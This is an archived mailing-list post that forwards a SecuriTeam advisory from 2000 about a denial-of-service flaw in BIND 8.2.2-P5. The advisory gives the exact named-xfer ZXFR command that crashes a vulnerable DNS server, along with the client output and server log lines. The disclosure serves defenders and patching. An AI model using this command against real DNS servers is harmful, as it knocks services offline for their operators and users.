[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-security] Fwd: [EXPL] BIND 8.2.2-P5 DoS vulnerability (exploit, BIND_ZXFR)

is cobalt gonna pay attention to this? i allready compiled 8.2.3-t6b on my cobalts.. 


Date: Thu, 9 Nov 2000 07:52:52 +0100 (CET)
Mailing-List: contact list-help@xxxxxxxxxxxxxx; run by ezmlm
X-No-Archive: yes
list-help: <mailto:list-help@xxxxxxxxxxxxxx>
list-unsubscribe: <mailto:list-unsubscribe@xxxxxxxxxxxxxx>
list-post: <mailto:list@xxxxxxxxxxxxxx>
Delivered-To: moderator for list@xxxxxxxxxxxxxx
From: support@xxxxxxxxxxxxxx
To: list@xxxxxxxxxxxxxx
Subject: [EXPL] BIND 8.2.2-P5 DoS vulnerability (exploit, BIND_ZXFR)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com 


  BIND 8.2.2-P5 DoS vulnerability (exploit, BIND_ZXFR)
------------------------------------------------------------------------


SUMMARY

A security vulnerability in BIND was discovered. The bug involves a
problem with the ZXFR feature - if the BIND_ZXFR feature has been
disabled, sending someone a request for a zone transfer may cause the BIND
DNS server to crash.

DETAILS

Vulnerable systems:
BIND 8.2.2-P5

Exploit:

We'll transfer the zone zone.example.com from the DNS server
dns.example.com (192.168.1.1) from the host attacker.example.org
(10.10.10.10). This will actually crash the server.

We will send a Zone Transfer request using "-Z" switch, meaning we wish to
use ZXFR. dns.example.com doesn't support ZXFR and have "allow-transfer{}"
not configured, so everyone can ask him for *.zone.example.com.

$ ./named-xfer  -z zone.example.com  -d 9 -f pics -Z dns.example.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.example.com"

On the server's log:
Nov  7 11:19:09 dns.example.com: named[188510]: approved ZXFR from
[10.10.10.10].2284 for "zone.example.com"
Nov  7 11:19:09 dns.example.com: named[188510]: unsupported XFR (type
ZXFR) of "zone.example.com" (IN) to [10.10.10.10].2284

The server then crashes.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:fabio@xxxxxxxxxxx> Fabio
Pietrosanti (naif).



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx 


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.